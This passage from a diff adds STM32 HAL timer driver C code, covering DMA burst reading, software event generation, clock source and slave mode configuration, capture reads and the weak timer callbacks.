htim->hdma[TIM_DMA_ID_UPDATE]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_UPDATE], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC1: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC2: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC3: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC4: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC4]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC4]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC4]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC4], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_COM: + { + /* Set the DMA commutation callbacks */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferCpltCallback = TIMEx_DMACommutationCplt; + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferHalfCpltCallback = TIMEx_DMACommutationHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_COMMUTATION], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_TRIGGER: + { + /* Set the DMA trigger callbacks */ + htim->hdma[TIM_DMA_ID_TRIGGER]->XferCpltCallback = TIM_DMATriggerCplt; + htim->hdma[TIM_DMA_ID_TRIGGER]->XferHalfCpltCallback = TIM_DMATriggerHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_TRIGGER]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_TRIGGER], (uint32_t)&htim->Instance->DMAR, (uint32_t)BurstBuffer, + DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Configure the DMA Burst Mode */ + htim->Instance->DCR = (BurstBaseAddress | BurstLength); + + /* Enable the TIM DMA Request */ + __HAL_TIM_ENABLE_DMA(htim, BurstRequestSrc); + } + + /* Return function status */ + return status; +} + +/** + * @brief Stop the DMA burst reading + * @param htim TIM handle + * @param BurstRequestSrc TIM DMA Request sources to disable. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_ReadStop(TIM_HandleTypeDef *htim, uint32_t BurstRequestSrc) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_DMA_SOURCE(BurstRequestSrc)); + + /* Abort the DMA transfer (at least disable the DMA stream) */ + switch (BurstRequestSrc) + { + case TIM_DMA_UPDATE: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_UPDATE]); + break; + } + case TIM_DMA_CC1: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + case TIM_DMA_CC2: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + case TIM_DMA_CC3: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + case TIM_DMA_CC4: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC4]); + break; + } + case TIM_DMA_COM: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_COMMUTATION]); + break; + } + case TIM_DMA_TRIGGER: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_TRIGGER]); + break; + } + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the TIM Update DMA request */ + __HAL_TIM_DISABLE_DMA(htim, BurstRequestSrc); + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + } + + /* Return function status */ + return status; +} + +/** + * @brief Generate a software event + * @param htim TIM handle + * @param EventSource specifies the event source. + * This parameter can be one of the following values: + * @arg TIM_EVENTSOURCE_UPDATE: Timer update Event source + * @arg TIM_EVENTSOURCE_CC1: Timer Capture Compare 1 Event source + * @arg TIM_EVENTSOURCE_CC2: Timer Capture Compare 2 Event source + * @arg TIM_EVENTSOURCE_CC3: Timer Capture Compare 3 Event source + * @arg TIM_EVENTSOURCE_CC4: Timer Capture Compare 4 Event source + * @arg TIM_EVENTSOURCE_COM: Timer COM event source + * @arg TIM_EVENTSOURCE_TRIGGER: Timer Trigger Event source + * @arg TIM_EVENTSOURCE_BREAK: Timer Break event source + * @note Basic timers can only generate an update event. + * @note TIM_EVENTSOURCE_COM is relevant only with advanced timer instances. + * @note TIM_EVENTSOURCE_BREAK are relevant only for timer instances + * supporting a break input. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_TIM_GenerateEvent(TIM_HandleTypeDef *htim, uint32_t EventSource) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_EVENT_SOURCE(EventSource)); + + /* Process Locked */ + __HAL_LOCK(htim); + + /* Change the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Set the event sources */ + htim->Instance->EGR = EventSource; + + /* Change the TIM state */ + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Configures the OCRef clear feature + * @param htim TIM handle + * @param sClearInputConfig pointer to a TIM_ClearInputConfigTypeDef structure that + * contains the OCREF clear feature and parameters for the TIM peripheral. + * @param Channel specifies the TIM Channel + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 + * @arg TIM_CHANNEL_2: TIM Channel 2 + * @arg TIM_CHANNEL_3: TIM Channel 3 + * @arg TIM_CHANNEL_4: TIM Channel 4 + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_ConfigOCrefClear(TIM_HandleTypeDef *htim, + TIM_ClearInputConfigTypeDef *sClearInputConfig, + uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_OCXREF_CLEAR_INSTANCE(htim->Instance)); + assert_param(IS_TIM_CLEARINPUT_SOURCE(sClearInputConfig->ClearInputSource)); + + /* Process Locked */ + __HAL_LOCK(htim); + + htim->State = HAL_TIM_STATE_BUSY; + + switch (sClearInputConfig->ClearInputSource) + { + case TIM_CLEARINPUTSOURCE_NONE: + { + /* Clear the OCREF clear selection bit and the the ETR Bits */ + CLEAR_BIT(htim->Instance->SMCR, (TIM_SMCR_ETF | TIM_SMCR_ETPS | TIM_SMCR_ECE | TIM_SMCR_ETP)); + break; + } + + case TIM_CLEARINPUTSOURCE_ETR: + { + /* Check the parameters */ + assert_param(IS_TIM_CLEARINPUT_POLARITY(sClearInputConfig->ClearInputPolarity)); + assert_param(IS_TIM_CLEARINPUT_PRESCALER(sClearInputConfig->ClearInputPrescaler)); + assert_param(IS_TIM_CLEARINPUT_FILTER(sClearInputConfig->ClearInputFilter)); + + /* When OCRef clear feature is used with ETR source, ETR prescaler must be off */ + if (sClearInputConfig->ClearInputPrescaler != TIM_CLEARINPUTPRESCALER_DIV1) + { + htim->State = HAL_TIM_STATE_READY; + __HAL_UNLOCK(htim); + return HAL_ERROR; + } + + TIM_ETR_SetConfig(htim->Instance, + sClearInputConfig->ClearInputPrescaler, + sClearInputConfig->ClearInputPolarity, + sClearInputConfig->ClearInputFilter); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + switch (Channel) + { + case TIM_CHANNEL_1: + { + if (sClearInputConfig->ClearInputState != (uint32_t)DISABLE) + { + /* Enable the OCREF clear feature for Channel 1 */ + SET_BIT(htim->Instance->CCMR1, TIM_CCMR1_OC1CE); + } + else + { + /* Disable the OCREF clear feature for Channel 1 */ + CLEAR_BIT(htim->Instance->CCMR1, TIM_CCMR1_OC1CE); + } + break; + } + case TIM_CHANNEL_2: + { + if (sClearInputConfig->ClearInputState != (uint32_t)DISABLE) + { + /* Enable the OCREF clear feature for Channel 2 */ + SET_BIT(htim->Instance->CCMR1, TIM_CCMR1_OC2CE); + } + else + { + /* Disable the OCREF clear feature for Channel 2 */ + CLEAR_BIT(htim->Instance->CCMR1, TIM_CCMR1_OC2CE); + } + break; + } + case TIM_CHANNEL_3: + { + if (sClearInputConfig->ClearInputState != (uint32_t)DISABLE) + { + /* Enable the OCREF clear feature for Channel 3 */ + SET_BIT(htim->Instance->CCMR2, TIM_CCMR2_OC3CE); + } + else + { + /* Disable the OCREF clear feature for Channel 3 */ + CLEAR_BIT(htim->Instance->CCMR2, TIM_CCMR2_OC3CE); + } + break; + } + case TIM_CHANNEL_4: + { + if (sClearInputConfig->ClearInputState != (uint32_t)DISABLE) + { + /* Enable the OCREF clear feature for Channel 4 */ + SET_BIT(htim->Instance->CCMR2, TIM_CCMR2_OC4CE); + } + else + { + /* Disable the OCREF clear feature for Channel 4 */ + CLEAR_BIT(htim->Instance->CCMR2, TIM_CCMR2_OC4CE); + } + break; + } + default: + break; + } + } + + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Configures the clock source to be used + * @param htim TIM handle + * @param sClockSourceConfig pointer to a TIM_ClockConfigTypeDef structure that + * contains the clock source information for the TIM peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_ConfigClockSource(TIM_HandleTypeDef *htim, TIM_ClockConfigTypeDef *sClockSourceConfig) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Process Locked */ + __HAL_LOCK(htim); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Check the parameters */ + assert_param(IS_TIM_CLOCKSOURCE(sClockSourceConfig->ClockSource)); + + /* Reset the SMS, TS, ECE, ETPS and ETRF bits */ + tmpsmcr = htim->Instance->SMCR; + tmpsmcr &= ~(TIM_SMCR_SMS | TIM_SMCR_TS); + tmpsmcr &= ~(TIM_SMCR_ETF | TIM_SMCR_ETPS | TIM_SMCR_ECE | TIM_SMCR_ETP); + htim->Instance->SMCR = tmpsmcr; + + switch (sClockSourceConfig->ClockSource) + { + case TIM_CLOCKSOURCE_INTERNAL: + { + assert_param(IS_TIM_INSTANCE(htim->Instance)); + break; + } + + case TIM_CLOCKSOURCE_ETRMODE1: + { + /* Check whether or not the timer instance supports external trigger input mode 1 (ETRF)*/ + assert_param(IS_TIM_CLOCKSOURCE_ETRMODE1_INSTANCE(htim->Instance)); + + /* Check ETR input conditioning related parameters */ + assert_param(IS_TIM_CLOCKPRESCALER(sClockSourceConfig->ClockPrescaler)); + assert_param(IS_TIM_CLOCKPOLARITY(sClockSourceConfig->ClockPolarity)); + assert_param(IS_TIM_CLOCKFILTER(sClockSourceConfig->ClockFilter)); + + /* Configure the ETR Clock source */ + TIM_ETR_SetConfig(htim->Instance, + sClockSourceConfig->ClockPrescaler, + sClockSourceConfig->ClockPolarity, + sClockSourceConfig->ClockFilter); + + /* Select the External clock mode1 and the ETRF trigger */ + tmpsmcr = htim->Instance->SMCR; + tmpsmcr |= (TIM_SLAVEMODE_EXTERNAL1 | TIM_CLOCKSOURCE_ETRMODE1); + /* Write to TIMx SMCR */ + htim->Instance->SMCR = tmpsmcr; + break; + } + + case TIM_CLOCKSOURCE_ETRMODE2: + { + /* Check whether or not the timer instance supports external trigger input mode 2 (ETRF)*/ + assert_param(IS_TIM_CLOCKSOURCE_ETRMODE2_INSTANCE(htim->Instance)); + + /* Check ETR input conditioning related parameters */ + assert_param(IS_TIM_CLOCKPRESCALER(sClockSourceConfig->ClockPrescaler)); + assert_param(IS_TIM_CLOCKPOLARITY(sClockSourceConfig->ClockPolarity)); + assert_param(IS_TIM_CLOCKFILTER(sClockSourceConfig->ClockFilter)); + + /* Configure the ETR Clock source */ + TIM_ETR_SetConfig(htim->Instance, + sClockSourceConfig->ClockPrescaler, + sClockSourceConfig->ClockPolarity, + sClockSourceConfig->ClockFilter); + /* Enable the External clock mode2 */ + htim->Instance->SMCR |= TIM_SMCR_ECE; + break; + } + + case TIM_CLOCKSOURCE_TI1: + { + /* Check whether or not the timer instance supports external clock mode 1 */ + assert_param(IS_TIM_CLOCKSOURCE_TIX_INSTANCE(htim->Instance)); + + /* Check TI1 input conditioning related parameters */ + assert_param(IS_TIM_CLOCKPOLARITY(sClockSourceConfig->ClockPolarity)); + assert_param(IS_TIM_CLOCKFILTER(sClockSourceConfig->ClockFilter)); + + TIM_TI1_ConfigInputStage(htim->Instance, + sClockSourceConfig->ClockPolarity, + sClockSourceConfig->ClockFilter); + TIM_ITRx_SetConfig(htim->Instance, TIM_CLOCKSOURCE_TI1); + break; + } + + case TIM_CLOCKSOURCE_TI2: + { + /* Check whether or not the timer instance supports external clock mode 1 (ETRF)*/ + assert_param(IS_TIM_CLOCKSOURCE_TIX_INSTANCE(htim->Instance)); + + /* Check TI2 input conditioning related parameters */ + assert_param(IS_TIM_CLOCKPOLARITY(sClockSourceConfig->ClockPolarity)); + assert_param(IS_TIM_CLOCKFILTER(sClockSourceConfig->ClockFilter)); + + TIM_TI2_ConfigInputStage(htim->Instance, + sClockSourceConfig->ClockPolarity, + sClockSourceConfig->ClockFilter); + TIM_ITRx_SetConfig(htim->Instance, TIM_CLOCKSOURCE_TI2); + break; + } + + case TIM_CLOCKSOURCE_TI1ED: + { + /* Check whether or not the timer instance supports external clock mode 1 */ + assert_param(IS_TIM_CLOCKSOURCE_TIX_INSTANCE(htim->Instance)); + + /* Check TI1 input conditioning related parameters */ + assert_param(IS_TIM_CLOCKPOLARITY(sClockSourceConfig->ClockPolarity)); + assert_param(IS_TIM_CLOCKFILTER(sClockSourceConfig->ClockFilter)); + + TIM_TI1_ConfigInputStage(htim->Instance, + sClockSourceConfig->ClockPolarity, + sClockSourceConfig->ClockFilter); + TIM_ITRx_SetConfig(htim->Instance, TIM_CLOCKSOURCE_TI1ED); + break; + } + + case TIM_CLOCKSOURCE_ITR0: + case TIM_CLOCKSOURCE_ITR1: + case TIM_CLOCKSOURCE_ITR2: + case TIM_CLOCKSOURCE_ITR3: + { + /* Check whether or not the timer instance supports internal trigger input */ + assert_param(IS_TIM_CLOCKSOURCE_ITRX_INSTANCE(htim->Instance)); + + TIM_ITRx_SetConfig(htim->Instance, sClockSourceConfig->ClockSource); + break; + } + + default: + status = HAL_ERROR; + break; + } + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Selects the signal connected to the TI1 input: direct from CH1_input + * or a XOR combination between CH1_input, CH2_input & CH3_input + * @param htim TIM handle. + * @param TI1_Selection Indicate whether or not channel 1 is connected to the + * output of a XOR gate. + * This parameter can be one of the following values: + * @arg TIM_TI1SELECTION_CH1: The TIMx_CH1 pin is connected to TI1 input + * @arg TIM_TI1SELECTION_XORCOMBINATION: The TIMx_CH1, CH2 and CH3 + * pins are connected to the TI1 input (XOR combination) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_ConfigTI1Input(TIM_HandleTypeDef *htim, uint32_t TI1_Selection) +{ + uint32_t tmpcr2; + + /* Check the parameters */ + assert_param(IS_TIM_XOR_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TI1SELECTION(TI1_Selection)); + + /* Get the TIMx CR2 register value */ + tmpcr2 = htim->Instance->CR2; + + /* Reset the TI1 selection */ + tmpcr2 &= ~TIM_CR2_TI1S; + + /* Set the TI1 selection */ + tmpcr2 |= TI1_Selection; + + /* Write to TIMxCR2 */ + htim->Instance->CR2 = tmpcr2; + + return HAL_OK; +} + +/** + * @brief Configures the TIM in Slave mode + * @param htim TIM handle. + * @param sSlaveConfig pointer to a TIM_SlaveConfigTypeDef structure that + * contains the selected trigger (internal trigger input, filtered + * timer input or external trigger input) and the Slave mode + * (Disable, Reset, Gated, Trigger, External clock mode 1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_SlaveConfigSynchro(TIM_HandleTypeDef *htim, TIM_SlaveConfigTypeDef *sSlaveConfig) +{ + /* Check the parameters */ + assert_param(IS_TIM_SLAVE_INSTANCE(htim->Instance)); + assert_param(IS_TIM_SLAVE_MODE(sSlaveConfig->SlaveMode)); + assert_param(IS_TIM_TRIGGER_SELECTION(sSlaveConfig->InputTrigger)); + + __HAL_LOCK(htim); + + htim->State = HAL_TIM_STATE_BUSY; + + if (TIM_SlaveTimer_SetConfig(htim, sSlaveConfig) != HAL_OK) + { + htim->State = HAL_TIM_STATE_READY; + __HAL_UNLOCK(htim); + return HAL_ERROR; + } + + /* Disable Trigger Interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_TRIGGER); + + /* Disable Trigger DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_TRIGGER); + + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configures the TIM in Slave mode in interrupt mode + * @param htim TIM handle. + * @param sSlaveConfig pointer to a TIM_SlaveConfigTypeDef structure that + * contains the selected trigger (internal trigger input, filtered + * timer input or external trigger input) and the Slave mode + * (Disable, Reset, Gated, Trigger, External clock mode 1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_SlaveConfigSynchro_IT(TIM_HandleTypeDef *htim, + TIM_SlaveConfigTypeDef *sSlaveConfig) +{ + /* Check the parameters */ + assert_param(IS_TIM_SLAVE_INSTANCE(htim->Instance)); + assert_param(IS_TIM_SLAVE_MODE(sSlaveConfig->SlaveMode)); + assert_param(IS_TIM_TRIGGER_SELECTION(sSlaveConfig->InputTrigger)); + + __HAL_LOCK(htim); + + htim->State = HAL_TIM_STATE_BUSY; + + if (TIM_SlaveTimer_SetConfig(htim, sSlaveConfig) != HAL_OK) + { + htim->State = HAL_TIM_STATE_READY; + __HAL_UNLOCK(htim); + return HAL_ERROR; + } + + /* Enable Trigger Interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_TRIGGER); + + /* Disable Trigger DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_TRIGGER); + + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Read the captured value from Capture Compare unit + * @param htim TIM handle. + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval Captured value + */ +uint32_t HAL_TIM_ReadCapturedValue(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpreg = 0U; + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + + /* Return the capture 1 value */ + tmpreg = htim->Instance->CCR1; + + break; + } + case TIM_CHANNEL_2: + { + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + /* Return the capture 2 value */ + tmpreg = htim->Instance->CCR2; + + break; + } + + case TIM_CHANNEL_3: + { + /* Check the parameters */ + assert_param(IS_TIM_CC3_INSTANCE(htim->Instance)); + + /* Return the capture 3 value */ + tmpreg = htim->Instance->CCR3; + + break; + } + + case TIM_CHANNEL_4: + { + /* Check the parameters */ + assert_param(IS_TIM_CC4_INSTANCE(htim->Instance)); + + /* Return the capture 4 value */ + tmpreg = htim->Instance->CCR4; + + break; + } + + default: + break; + } + + return tmpreg; +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group9 TIM Callbacks functions + * @brief TIM Callbacks functions + * +@verbatim + ============================================================================== + ##### TIM Callbacks functions ##### + ============================================================================== + [..] + This section provides TIM callback functions: + (+) TIM Period elapsed callback + (+) TIM Output Compare callback + (+) TIM Input capture callback + (+) TIM Trigger callback + (+) TIM Error callback + +@endverbatim + * @{ + */ + +/** + * @brief Period elapsed callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_PeriodElapsedCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PeriodElapsedCallback could be implemented in the user file + */ +} + +/** + * @brief Period elapsed half complete callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_PeriodElapsedHalfCpltCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PeriodElapsedHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Output Compare callback in non-blocking mode + * @param htim TIM OC handle + * @retval None + */ +__weak void HAL_TIM_OC_DelayElapsedCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_OC_DelayElapsedCallback could be implemented in the user file + */ +} + +/** + * @brief Input Capture callback in non-blocking mode + * @param htim TIM IC handle + * @retval None + */ +__weak void HAL_TIM_IC_CaptureCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_IC_CaptureCallback could be implemented in the user file + */ +} + +/** + * @brief Input Capture half complete callback in non-blocking mode + * @param htim TIM IC handle + * @retval None + */ +__weak void HAL_TIM_IC_CaptureHalfCpltCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_IC_CaptureHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief PWM Pulse finished callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_PWM_PulseFinishedCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PWM_PulseFinishedCallback could be implemented in the user file + */ +} + +/** + * @brief PWM Pulse finished half complete callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_PWM_PulseFinishedHalfCpltCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_PWM_PulseFinishedHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Hall Trigger detection callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_TriggerCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_TriggerCallback could be implemented in the user file + */ +} + +/** + * @brief Hall Trigger detection half complete callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_TriggerHalfCpltCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_TriggerHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Timer error callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIM_ErrorCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_ErrorCallback could be implemented in the user file + */ +} + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User TIM callback to be used instead of the weak predefined callback + * @param htim tim handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_TIM_BASE_MSPINIT_CB_ID Base MspInit Callback ID + * @arg @ref HAL_TIM_BASE_MSPDEINIT_CB_ID Base MspDeInit Callback ID + * @arg @ref HAL_TIM_IC_MSPINIT_CB_ID IC MspInit Callback ID + * @arg @ref HAL_TIM_IC_MSPDEINIT_CB_ID IC MspDeInit Callback ID + * @arg @ref HAL_TIM_OC_MSPINIT_CB_ID OC MspInit Callback ID + * @arg @ref HAL_TIM_OC_MSPDEINIT_CB_ID OC MspDeInit Callback ID + * @arg @ref HAL_TIM_PWM_MSPINIT_CB_ID PWM MspInit Callback ID + * @arg @ref HAL_TIM_PWM_MSPDEINIT_CB_ID PWM MspDeInit Callback ID + * @arg @ref HAL_TIM_ONE_PULSE_MSPINIT_CB_ID One Pulse MspInit Callback ID + * @arg @ref HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID One Pulse MspDeInit Callback ID + * @arg @ref HAL_TIM_ENCODER_MSPINIT_CB_ID Encoder MspInit Callback ID + * @arg @ref HAL_TIM_ENCODER_MSPDEINIT_CB_ID Encoder MspDeInit Callback ID + * @arg @ref HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID Hall Sensor MspInit Callback ID + * @arg @ref HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID Hall Sensor MspDeInit Callback ID + * @arg @ref HAL_TIM_PERIOD_ELAPSED_CB_ID Period Elapsed Callback ID + * @arg @ref HAL_TIM_PERIOD_ELAPSED_HALF_CB_ID Period Elapsed half complete Callback ID + * @arg @ref HAL_TIM_TRIGGER_CB_ID Trigger Callback ID + * @arg @ref HAL_TIM_TRIGGER_HALF_CB_ID Trigger half complete Callback ID + * @arg @ref HAL_TIM_IC_CAPTURE_CB_ID Input Capture Callback ID + * @arg @ref HAL_TIM_IC_CAPTURE_HALF_CB_ID Input Capture half complete Callback ID + * @arg @ref HAL_TIM_OC_DELAY_ELAPSED_CB_ID Output Compare Delay Elapsed Callback ID + * @arg @ref HAL_TIM_PWM_PULSE_FINISHED_CB_ID PWM Pulse Finished Callback ID + * @arg @ref HAL_TIM_PWM_PULSE_FINISHED_HALF_CB_ID PWM Pulse Finished half complete Callback ID + * @arg @ref HAL_TIM_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_TIM_COMMUTATION_CB_ID Commutation Callback ID + * @arg @ref HAL_TIM_COMMUTATION_HALF_CB_ID Commutation half complete Callback ID + * @arg @ref HAL_TIM_BREAK_CB_ID Break Callback ID + * @param pCallback pointer to the callback function + * @retval status + */ +HAL_StatusTypeDef HAL_TIM_RegisterCallback(TIM_HandleTypeDef *htim, HAL_TIM_CallbackIDTypeDef CallbackID, + pTIM_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(htim); + + if (htim->State == HAL_TIM_STATE_READY) + { + switch (CallbackID) + { + case HAL_TIM_BASE_MSPINIT_CB_ID : + htim->Base_MspInitCallback = pCallback; + break; + + case HAL_TIM_BASE_MSPDEINIT_CB_ID : + htim->Base_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_IC_MSPINIT_CB_ID : + htim->IC_MspInitCallback = pCallback; + break; + + case HAL_TIM_IC_MSPDEINIT_CB_ID : + htim->IC_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_OC_MSPINIT_CB_ID : + htim->OC_MspInitCallback = pCallback; + break; + + case 